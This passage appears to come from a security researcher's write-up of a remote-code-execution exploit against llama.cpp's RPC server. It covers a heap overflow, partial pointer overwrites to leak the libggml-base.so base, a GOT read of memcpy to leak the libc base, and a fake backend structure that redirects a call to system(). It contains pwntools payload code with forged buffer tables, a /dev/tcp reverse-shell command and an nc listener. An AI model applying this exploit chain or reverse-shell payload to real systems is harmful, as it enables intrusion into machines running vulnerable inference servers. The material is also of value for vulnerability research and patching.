), pointing to the ggml_backend_cpu_buffer_type::ggml_backend_cpu_buffer_type
in ggml/src/ggml-backend.cpp
offset +0xb20
(0x4ab20
)! A valid DDL-loaded address! (The name of this method is indeed confusing enough, as it says returns the type of the ggml_backend_buffer
, it actually returns a reference to the type
structure)
It seems like despite the fact that ggml_backend_buffer_get_type
and ggml_backend_cpu_buffer_get_base
is 1700 lines away from each other, they are still loaded at a pretty adjacent address with a difference of 0x7c1
(Note that we are not calculating the difference of ggml_backend_buffer_get_base
and ggml_backend_buffer_get_type
, since actually ggml_backend_cpu_buffer_get_base
is bind on the targeted iface->get_buffer pointer)
. 0x7c1
is a really proper offset, theoretically the best target during partial-writing because the DDL is aligned as 0xfff
as we mentioned previously. However, re-mentioning from the Paradox-of-Partial-Writing part we mentioned before, the fact is that we cannot just write a half-byte (not with the overflow we have), we will still have to guess a half-byte however we are promised to guess the right one with maximum of 0xf
(16) attempts, which is pretty nice for pwn exploitation, since most canary brute-forcing or heap spraying requires much more attempts!
ggml_nbtyes
: ne[]
+ nb[]
= ?
Now we have a victim /estination, and a target /anipulation for partial-writing, the only requirement for the leakage is finding the right combination for ne[]
/ nb[]
of Tensor
to overflow the right place at the right time, in order to partial write these essential bits of buffer->iface->free_buffer
.
From calculating the distance between dst->data
(memcpy
destination) to (dst->buffer)+8(size_t)+2
(we used minus since heap grows upward), the offset required for us to overwrite the last two bytes (LSB
) of the iface->get_base
pointer is 282
, 0x11a
As we introduced a few parts of the implementation of ggml_nbytes()
in the Prerequisites part of the research, we didn't really delve deep into the details of the size calculation it, for partial writing, we must control very carefully the overflown bytes (God I really like to repeat things!), as a reminder, this is how the of ggml_nbytes()
is calculated:
size_t ggml_nbytes(const struct ggml_tensor * tensor) {
size_t nbytes;
const size_t blck_size = ggml_blck_size(tensor->type);
if (blck_size == 1) {
nbytes = ggml_type_size(tensor->type);
// #define GGML_MAX_DIMS 4
for (int i = 0; i < GGML_MAX_DIMS; ++i) {
nbytes += (tensor->ne[i] - 1)*tensor->nb[i];
}
}
else {
nbytes = tensor->ne[0]*tensor->nb[0]/blck_size;
for (int i = 1; i < GGML_MAX_DIMS; ++i) {
nbytes += (tensor->ne[i] - 1)*tensor->nb[i];
}
}
return nbytes;
}
As the tensor->ne[i]
(shape) and tensor->nb[i]
(stride) arrays are full controllable, blck_size
being partially controllable (determined by own property, the returned nbytes
is basically calculated by (tensor->ne[0] - 1)*tensor->nb[0]/blck_size+(tensor->ne[i] - 1)*tensor->nb[i]
(optimized when blck_size=1
, possibly for optimization behavior when dealing with a great amount of tensors).
This calculation is sometimes a pain-in-the-butt when lots of adjustment happens in the buffer->context
/ buffer
structure, thus we created these tools -> Protosec-Research/ggml-nbytes
It firstly creates a rainbow table that maps out the shape
, strides
and type_traits[type].blck_size;
with the corresponded nbytes
, (This is a relatively small-calculation required task, generating a 254 KB
table required less than few seconds). Furthermore, with the generated rainbow table to can directly look up proper shape / dimensions
/ strides
with specified nbytes
Since we have a buffer->type
of 2
, ggml_blck_size(tensor->type)
of 0x20
, we found the ggml_nbytes
array parameter of ne[] = {32*3,32*3,32*3,63}
, nb[] = {10,1,1,1}
. This gave us the size of ((32*3)*10//32)+((32*3-1)*1)+((32*3-1)*1)+(63-1*1)
-> 30+95+95+62=282
, exactly the offset we are looking for, for now, we just need to construct Tensor src
using the parameter, while using set_tensor
to the dst->data
chunk with specific data. (Remember not to corrupt the header information for chunk dst->buffer
, in this case we need set offset 248
to the header structure, as we probably mentioned before)
We manipulated iface->get_base
's lower-two bytes to our payload (b'aaaa'
s) without interfering any rest parts of the pointer. Now we just need to manipulate this part of the pointer to ggml_backend_buffer_get_type
, then trigger the buffer_get_base
original call chain (RPC_CMD_BUFFER_GET_BASE -> server.buffer_get_base -> ggml_backend_buffer_get_base -> buffer->iface.buffer_get_base(buffer); -> ggml_backend_cpu_buffer_get_base
) thought RPC
endpoint, the return value of manipulated ggml_backend_buffer_get_type
will be returning as a part of the response
variable in ggml-rpc.cpp
, and we will be able to retrieve it through the socket RPC
connections.
Here we successfully leaked the address of ggml_backend_buffer_get_type
(ignoring the miss-alignment), as we mentioned previously, this is a libggml-base.so
loaded DDL address, by calculating it's fixed offset to the (we used two variable in the exp.py
, the ggml_bae
and ggml_begin
, this is because vmmap
and pwntools
's ELF()
interpretation are based in a different base. The vmmap
offset in pwndbg
is segmented to three parts), we now have the libggml-base.so base
address, this allowed us to redirect the execution flow to arbitrary methods loaded in libggml-base.so
. Furthermore allowed us to:
Fake
buffer->iface
structure method pointers to original DLL address to avoid any malfunction / unexpected corruption to thebuffer
structure, allowed us to explore the possibility ofbuffer->context
pointer, allowing us to mess withparadox-of-overflow
Calculate the
got
address of a function loaded in the DLL.
Here the first ability is the leakage of libggml-base.so
is most essential to us, since (re-explaining and repeating) as we mentioned before, the sanitization / patches for previous exploitations are based on buffer_get_context
and buffer_get_size
, by manipulating the buffer->context
pointer, we can bypass and re-establish the read-what-wheres
and write-what-wheres
previously we introduced, and by leaking the ggml
library loaded memcpy
got allowed us to to find the reference of this method to its standard library, and here, we are going construct our second leak.
If you wonder why we need to leak another library, the answer is in order for us to receive a reverse shell via the heap-overflow, where we don't have direct control over a
rwx
segment as we do in stack-overflows, the best way is to execute commands viasystem()
and pass in command-stored address as an argument. Except when thesesystem()
class directly loaded in the DLL, or called previously in the program (Lazy binding). Otherwise, the only way for us to reference is via the standard DDLs such aslibc.so.6
(By the way, I really don't like to say DLL since it really sounds like a thing that people say only when they are in context of Windows, however I considered it bit confusing to satlibc
all the time since two DLL are mentioned in this write-up, so why not?)
Leak No.2: Paradox-of-Overflow, GOT Tables.
Compared to our No.1 leak, Leak No.2 is comparably simpler. In order to leak the libc.so.6
base address, the best way for us to do such is to break the Paradox-of-Overflow we mentioned previously, it's easily solved since we have entire leaks on the libggml-base
base address, the fake buffer->context
, the final objective in our Paradox-of-Overflow, can be easily manipulated without any effects on functioning pointers.
The key here is to use the RPC
native ggml_backend_cpu_buffer_get_tensor
to leak a GOT
value that tells us about the libc
base. By looking into the ELF('lib-ggml.so')
's .got
reference, we can find our favorite .got['memcpy']
- we chose memcpy
not because it's our favorite, rather it has already been called previously, we can directly leak it's DLL address without dl_runtime_resolve
and lazy-binding whatever;
To begin with, we will firstly construct a fake ggml_backend_buffer
table (The buffer->iface
structure) using the known ggml_base
address + known-fixed offset of the method, the only trick here is you can try to keep free_buffer
as NULL
, leave buffer->size
the same as it was. memcpy
's GOT
address can be calculated using the ggml_begin
address + ggml.got['cpy']
.
ggml = ELF('./libggml-base.so', checksec=False)
payload = flat({
248:[
fake_ggml_backend_buffer_table(
free_buffer = 0,
get_base = ggml_base + get_base_offset,
init_tensor = ggml_base + init_tensor_offset,
memset_tensor = ggml_base + memset_tensor_offset,
set_tensor = ggml_base + set_tensor_offset,
get_tensor = ggml_base + get_tensor_offset,
cpy_tensor = ggml_base + cpy_tensor_offset,
clear = ggml_base + clear_offset,
reset = ggml_base + reset_offset,
buft = 0x0,
context = ggml_begin + ggml.got['memcpy'] - 0x30,
size = 0x110,
usage = 0x0,
),
p64(0x111)
]
})
Notice here how we change the buffer->context
pointer into ggml.got['memcpy']-0x30
, as we mentioned the p0 = (size_t) ggml_backend_buffer_get_base(tensor->buffer)
is eventually just a wrapper for buffer->context
, changing the p0
will simply fail the entire request.tensor.data + request.offset < p0, request.tensor.data + request.offset >= p0 + buffer->size
patch, that we should've mentioned in ggml/src/ggml-rpc/ggml-rpc.cpp:924
. We left a 0x30
space is for context pointer to leave a little chunky room for p0
examinations.
Now, all we have to do is to call ggml_backend_cpu_buffer_get_tensor
on this manipulated buffer
structure, because we left the beloved free_buffer
as NULL
, this buffer
will never be freed, since we change the buffer->context
, RPC
sanitization will believe we are trying to read a legit alloc_buffer
allocated context address, vomiting out the content of it:
The content of memcpy[got]
leaked! (since we specified the size of ggml_backend_cpu_buffer_get_tensor
, only 0x8
bytes of data is being vommited, you can output as much as the GOT
table you want, of-course). (Here the libc.so.6
mapped such a wide a range of address, memcpy
is located in offset 0x1a12c0
of the libc.so.6
base, we are pretty lucky that libggml-base.so
have such small range that allows us to exploit partial writing.)
With the leak of libc.so.6
, we should be able access the a considerable of method that can help us, such as system()
, execve()
, syscall()
, one_gadgets
that can leads to possible directly bin/sh
connection. However, trying to remote-code execute on the server isn't as easy as how it seems like.
Remote-Code Execution: New paradox, Structure-Oriented Programming?
Remote-Code Execution, even now the mitigations on the write-what-wheres
/ read-what-wheres
bypassed, is still not an easy thing to achieve. Previous exploitation-al write-ups on Llama.cpp
were created before the the mitigations implementation were implemented. This allowed them to arbitrary pass things into buffer->iface
methods listen in the RPC
server and changing the buffer->iface
pointers will be enough for them to RCE.
However, we are dealing a much more harder (or rather, secure) version of Llama.cpp
, we can no longer mess with things that arbitrary since checks are implemented everywhere. The past exploitation doesn't work anymore as Llama.cpp
checks if the passed in buffer
pointers belongs to the globally-managed buffers
, passing in a external pointer will just set the pointer to NULL
. At the meantime, you can't just manipulate the execution flow to one_gadgets
, since we are not dealing with CTFs
challenges that simple routes stdin/stdout
to/from the elf
- executing /bin/sh
won't really does anything (Probably suspend the process and that's all?). we will need to execute custom commands to establish shell connections.
Fortunately, past exploitation methodology on NullPointerNoException
still works, we can call an arbitrary method, with manipulated rdi
(first-parameter). But this still gave us a lot of limitations,
Most of time that we have control over the execution flow with a controllable argument, we will try to find a call wrapper (that imitates another method with parameter related to argument For example, ggml_backend_alloc_buffer
is a call-wrapper for ggml_backend_buft_alloc_buffer(ggml_backend_get_default_buffer_type(backend), size)
)
Nevertheless, firstly, we say that we have control over the rdi
, but we actually only have parts / selective controll over it, as we introduced the buffers
examinations, the passed in rdi
must be a globally-managed buffer
structure stored in buffers[]
, at the meantime, call-wrappers usually call-wraps the argument itself (call another method, pass-in the original argument), it is impossible to find these ideal call-wrappers that does something we will want in ROPS
, such as cll rdi+0x10
, then pass rdi+0x20
as argument, at least impossible in libggml-base.so
and most DDLs RPC
server loaded, that I went through the source-codes of.
Head-ups, we can't just edit the globally stored
buffers[]
- It's stored globally to begin with and we will need to leak it's address to modify it will the bypassedwrite-what-wheres
, that's very sad
And the thing about buffer
structures is, as much as it's controllable to us, the first member, - free_buffer
- the buffer
stands for as a argument, is limited and not fully controllable to us as it's valid pointer address, or NULL, and most (every) of time we try to call a system()
for shell, that pointer will be pointing some address with data (For example, the commands that we want to execute) that doesn't contains valid instruction while being not executable at all. (It will be another story if we can find a actual rwx
segment that we know the address of, but re-stating, that will be another totally different story)
This is what I noted during the exploitation:
bin/sh
won't work at all, we are on a self-designedrpc
socket system, not as these CTF contest that directly monitors onstdout
/stdin
rdi
must be abuffer
address that's included in the globalbuffers
list (managed duringalloc_buffer
/free_buffer
), we can't fake abuffer
structurebuffers
is on somewhere we don't know, sadly you can't leak italthough we can control
buffer->iface
's pointers, however, we must leavebuffer->iface->free_buffer
asnullpt
/ valid address to avoid crashes during thebackend_buffer_free
right after the overflow, we can't pointbuffer->iface->free_buffer
to a data address that's not executable. (This implicitly stands for the limitation we mentioned when parsingbuffer
as a argument, it meansbuffer->iface->free_buffer
(the very first member of thebuffer
structure))
Therefore, for us to successful achieve RCE in such context with limitation, we will have to find a way that RPC
somehow successfully interpreted the called method as a buffer
based address, while another buffer
based address as a argument, and neither of this can be buffer
, since the first element is not-mess-around-able. And the best way for to do such, is via Structure-Oriented Programming. And the final payload we got is seemly fascinating.
Structure-Oriented Programming: World-of-Offsets, Four layers call-chain, Perspectives
To begin with, we must all heard of the operator, '->'
in whether cpp
/ c
(not sure if this is a only c
thing), if not, I wonder how it's possible for you that to read till here *(or you probably just jump to this section);
At the begin, I always through this is a member indicator to access class members, use such commonly in our OOP world. However, at a certain point in your life some special someone (I hope this special someone is not me) will tell you that: All member indicators are, eventually, just offset. When you will finally start to understand the truth of life and binary-exploitations, and unlock one of the best thing in binary-exploitation (except gdbing
) - messing with structures, with that being said, Structure-Oriented Programming.
Despite the fact that our argument are asked to be a buffer
structure, which seemly impossible to exploit, but no-one says it must be interpreted as a buffer
structure, and that's the key for us to construct the final-step - Remote-Code Executions. Even though we do-not have that much of control over buffer
, we can try to interpret it to something else by the call-wrappers and result in unexpected results.
ggml_backend_t
&& ggml_backend_dev_t
:
ggml_backend_t
, ggml_backend_dev_t
is two structure we haven't mentioned at all before, in fact, ggml_backend_dev_t
is included in the ggml_backend_t
structure as ggml_backend->type
struct ggml_backend {
ggml_guid_t guid;
struct ggml_backend_i iface;
ggml_backend_dev_t device;
void * context;
};
struct ggml_backend_device {
struct ggml_backend_device_i iface;
ggml_backend_reg_t reg;
void * context;
};
A GGML backend is an abstraction layer that provides a unified interface for executing machine learning computations across different hardware devices (like CPU, GPU, or other accelerators). It handles all device-specific operations including memory management (allocation, transfers, and synchronization), computation execution (both synchronous and asynchronous), tensor operations, and event handling for synchronization between operations. Each backend implementation (such as CUDA, Metal, or Vulkan) follows a standard interface while providing device-specific optimizations, allowing the GGML framework to seamlessly work with different hardware while maintaining a consistent API, with automatic fallback to CPU if specialized hardware is unavailable.
For every ggml_backend
thread, there a ggml_backend
that manages this thread. Both the ggml_backend
and ggml_backend_device
have a iface
table, similar to our buffer
structure (I didn't put it out since it would take up too much space). We don't particularly need to know that detailed regarding how ggml_backend
/ ggml_backend_device
works as how we buffer
, but it's essential for us to understand it's basic structure, which will be very essential.
You might wonder why we are mentioning it now; we never referenced this or saw this structure anywhere in this write-up. The reason why we bought this up is connected with our Structure-Oriented Programming journey.
Perspectives, and interpretations
During the process of researching on usable call-wrapper
regarding the limitations of our rdi
being buffer
structure constrained, nothing helpful was found at all, despite the entire ggml_backend.c
/ ggml_backend.h
being reviewed. (Pretty much all call-wrapper are useless whether it directly passed in a meaningless argument to a controllable buffer->iface
pointer after internal logics, or the specified buffer
offset is not controllable) This is very sad, however, as further the research goes, an interesting method that gave us a little hope of success pop out;
size_t ggml_backend_get_alignment(ggml_backend_t backend) {
return ggml_backend_buft_get_alignment(ggml_backend_get_default_buffer_type(backend));
}
Here, the ggml_backend_get_alignment
is what we are talking about, now you might understand why I introduced the backend
structure to you. However, it's still not certain since it only looks like a nested two call-wapper wrapper, taking a ni
into the methods; Here this wrapper have three parts that we might be interested in: ggml_backend_buft_get_alignment
,ggml_backend_get_default_buffer_type
, and a internal ggml_backend_get_default_buffer_type
method; For now, let's focus on the ggml_backend_get_default_buffer_type
related implementations.
ggml_backend_buffer_type_t ggml_backend_get_default_buffer_type(ggml_backend_t backend) {
return ggml_backend_dev_buffer_type(backend->device);
}
ggml_backend_buffer_type_t ggml_backend_dev_buffer_type(ggml_backend_dev_t device) {
return device->iface.get_buffer_type(device);
}
These is the most essential two lines of implementation in our structure-oriented programming section, the ggml_backend_get_alignment
calls ggml_backend_get_default_buffer_type
as the parameter for ggml_backend_buft_get_alignment
, while passing the parameter backend
into the parameter callee ggml_backend_get_default_buffer_type
; And inside of ggml_backend_get_default_buffer_type
, ggml_backend_dev_buffer_type
is called as return value, with the passed backend->device
as an argument, while ggml_backend_dev_buffer_type
calls the device->iface.get_buffer_type(device)
with the argument.
This sounds really confusing, but it will be much less complex reading the original call chain, and if I list all the final calls, and parameters for it, here is how it goes:
Called
ggml_backend_get_alignment
:Calls
ggml_backend_buft_get_alignment
; Argument:ggml_backend_get_default_buffer_type(backend)
(Here we are ignoring this part)Calls
ggml_backend_get_default_buffer_type
; Argument:backend
Calls
ggml_backend_dev_buffer_type
, Argument:backend->device
- Calls
device->iface.get_buffer_type
(backend->device->iface.get_buffer_type
), Argument:device
(backend->device
)
- Calls
How interesting is that, This is a 4-layer nested call-chain, the backend
parameter at the beginning is passed all the way down into the final method call backend->device->iface.get_buffer_type
, while it's parameter is also a a backend member (device
(backend->device
))!
Recall our introduction to the backend
structure, the first member is ggml_guid_t guid
, typedef uint8_t ggml_guid[16]
- 16 sized uint8_t
, this member is not called in the nested call-chain thus avoids us from messing with the partially-incontrollable buffer->iface->free_buffer
pointer. The only manipulated member required is the buffer->device
structure, luckily, at the meantime, the manipulation required pointer buffer->device->iface->get_buffer_type
happens to be the 7th member of the device
structure, this means possible data manipulation on buffer->device
(first member of buffer->device
) will not conflicts with out exploitation.
What this means is that, if the buffer
structure with a is forged a with a backend
structure with a validly-forged device
included structure (Importantly a proper forged device->iface
structure) **we are able to call a manipulable pointer with a manipulated parameter.*; Where we call the buffer->device->iface->get_buffer_type
, parameter as `buffer->device.
This requires a little bit of calculation of forging backend
's arrangement base on the original buffer
(this will still be based on overflowing buffer
from buffer->context
, thus not corrupting chunk header is still important). This can be easily achieved by observing the backend
structure or payload-ing pwntools
's cyclic()
to observe the structural arrange with gdb
's p/x* (ggml_backend) address
:
payload = flat({
0:[
p64(0xdeadbeef),
cmd,
],
0x616161706161616f: [p64(system)],
248:[
fake_ggml_backend_buffer_table(
free_buffer = 0,
get_base = ggml_base + ggml_backend_get_alignment,
init_tensor = 0xdeadbeef,
memset_tensor = 0xdeadbeef,
set_tensor = 0xdeadbeef,
get_tensor = 0xdeadbeef,
cpy_tensor = 0xdeadbeef,
clear = 0xdeadbeef,
reset = 0xdeadbeef,
buft = 0xdeadbeef,
context = 0xdeadbeef,
size = 0x110,
usage = 0,
),
p64(0x111),
p64(manipulated_buffer_base_3+0x10),
]
})
Converting the theoretical exploitation into reality needs an extra bit of consideration and tricks; To begin with, we do not replace the original buffer
structure yet, since we still depends on the buffer->iface
pointer manipulations to redirect the execution-flow. (At the meantime). A trick in the exploitation here is we forge the backend->device
structure in the buffer->context
(or you might call it base), and forging the backend->device
pointer in the backend
structure based on buffer
. This in on hand enabled more rooms for us, on the other hand necessary as the backend->device
will be dereferenced as a pointer. On the base of this, we set the begin of buffer->context
, or the backend->device
during re-interpretation, as the parameter stored at the deference address of backend->device
, we then plants buffer->device->iface->get_buffer_type
on it's offsets to the device structure, as this time to the buffer->context
(in other ways, it will be (ggml_backend_buffer) buffer->context (ggml_backend) ->iface->get_buffer_type
):
This is what the memory layout should looks like, buffer
based (Even though it says backend
, it's because this breakpoint is set on ggml_backend_get_alignment
after the controll-flow hijack) that's being passed into using the same methodology from the hijacked get_base
, this is all about leaving the original structure while allowing re-interpretations and messing with pointers and offsets. Here we manipulated backend->device->iface->get_buffer_type
to system()
, with the leaked libc.so.6
address we got from leaking the libggml-base.so
from partial writing, and manipulated backend->device
pointer pointing to the context
address where we wrote the specific argument for the manipulated, in this case, the command that we want to system()
execute.
After finishing all these and heap arrangement / related-operations in exp.py
, as the moment this buffer
's get_base
is re-called, here, the final objective, remote specified code, will be executed in the RPC
Server.
Looking back into the exploitation process, with all the Paradox-of-Overflow, Paradox-of-Partial-Writing, and the structural constraints we encountered, we were still able to achieve aRemote Code Execution by leveraging techniques. Despite the stringent memory checks, custom heap management, and multiple mitigations implemented in Llama.cpp, we navigated through these challenges with careful analysis and creative problem-solving! From identifying the heap-overflow vector hidden in
ggml_backend_cpu_buffer_cpy_tensor
to exploiting the NullPointerNoException and finally deploying Structure-Oriented Programming, each step required a little bit of patience (as well as luck lol) and learnt a little bit, I am glad to made it here, and what a magical exploitation it is!
Exploitation: The realistic implementations, and exp.py
Here is final version of the exp.py
(Since it takes up too much space, I decided not to put it here, it will be at gist), eventual you will have to covert these exploitation-al ideas to a realistic interaction with llama.cpp
's interaction. I will explain how each exploitation-al step is implemented. (Notice that the implementation of RPC
Communication Protocols is deleted, I don't want spend space and time explain llama.cpp
's RPC Protocols
, you should be able to figure that out yourself)
To begin with, before starting any exploitation-al process, we firstly allocates required
buffer
using thealloc_buffer
, then retrieving each'sbuffer->context
using theget_base
buffer->iface
method. Notice here how we arrange the size for each chunks to maximum the size of input (overflow payload).written_buffer
is for thesrc
ofcpy_tensor
operations,manipulated_buffer
being thecpy_tensor
'sdst
of overflow. We are required to overflow 3 times during the exploitation (first time leakinglibggml-base.so
, second time leakinglibc.so.6
via mitigation bypass, last time overflowing to forgebackend
structures to use the call-wrappers). There's still parts of unreason behavior going on on the heap arrangement that we cannot explain of, for example, we must allocate three paddingbuffer
aftermanipulated_buffer_2
orwritten_buffer_3
will be adjacent to two freed buffers despite we allocate new ones after, this will result us to not-able-toset_tensor
thewritten_buffer_3
for further exploitation, while we need to allocate abuffer_list
thats from a deprecated previous failed exploitation, if I remove it arrangement just gone wrong (This is weird and not yet explainable)Then we partial-write the lowest two-bytes of the
buffer->iface->free_buffer
pointer toggml_backend_buffer_get_type
to leaklibggml-base.so
by leaking out thebuffer->buft
address that is located on thelibggml-base.so
vmmap
address. Notice here how we manually construct thesrc
tensor as partial-writing's specialne[] / nb[]
calculations that we need to pay attentions to. We firstly set the payload to thewritten_buffer_base
buffer, then callcpy_tensor
to overflow thedst
tensor withsrc
tensor, this is also why we applied for a small size for themanipulated_buffer_base
.pwntools
nativeio.recvn(0x18)
is used to receive a certain size ofsocket
response, in this case, we will still have to align / bits-tranforms the receivedlibggml-base.so
:ggml_backend_cpu_buffer_type
pointer. Furthermore, with the receivedlibc.so.6
pointer, we can calculate the remindingbuffer->iface
components'sDLL
address.
With the calculated
ggml_base
address based on partial-writing techniques, we are able to forge thefake_ggml_backend_buffer_table
breaking the paradox-of-overflow, we are fakingbuffer->context
address to bypass pastp0/p1
mitigations onget_tensor
boundary. We are leakingggml.got['memcpy']
to leak theGOT
addresses andlibc.so.6
address. After the partial-writing exploitation, we doesn't need to aim for a specificnbytes
size. However, we must make sure thatnbytes
will not be too big or it might unexpectedly overflow proceeding chunks.With known
libggml-base.so
andlibc.so.6
address, we finally forge abackend
buffer
structure, that. is both interpretable as abuffer
structure when manipulating the control flow to thebuffer->iface->get_base
call, while can be interpreted asbackend
structure; When we are calling for theggml_backend_get_alignment
call wrapper for the 3-layer-call-chain. Creating a structure ofbuffer->iface->get_base = ggml_backend_get_alignment
,backend->device = buffer->context
,backend->device->iface->get_buffer_type = system()
, write the first-parameter ofjmp-ed
system()
inbackend->device
ggml_backend_get_default_buffer_type(backend)
will triggerbackend->device->iface->get_buffer_type
with parameterbackend->device
, in this casebuffer->context->iface->get_buffer_type (system)
with parameterbackend->device (the argument)
. In the exploitation we set up a reverse-shell commandsh -i >& /dev/tcp/127.0.0.1/1337 0>&1\x00
, creating a reverse-shell connection viash
on127.0.0.1:1337
Listen on
127.0.0.1:1337
withnc -lvp 1337
, a reverse-shell connection will be received after the execution of the payload.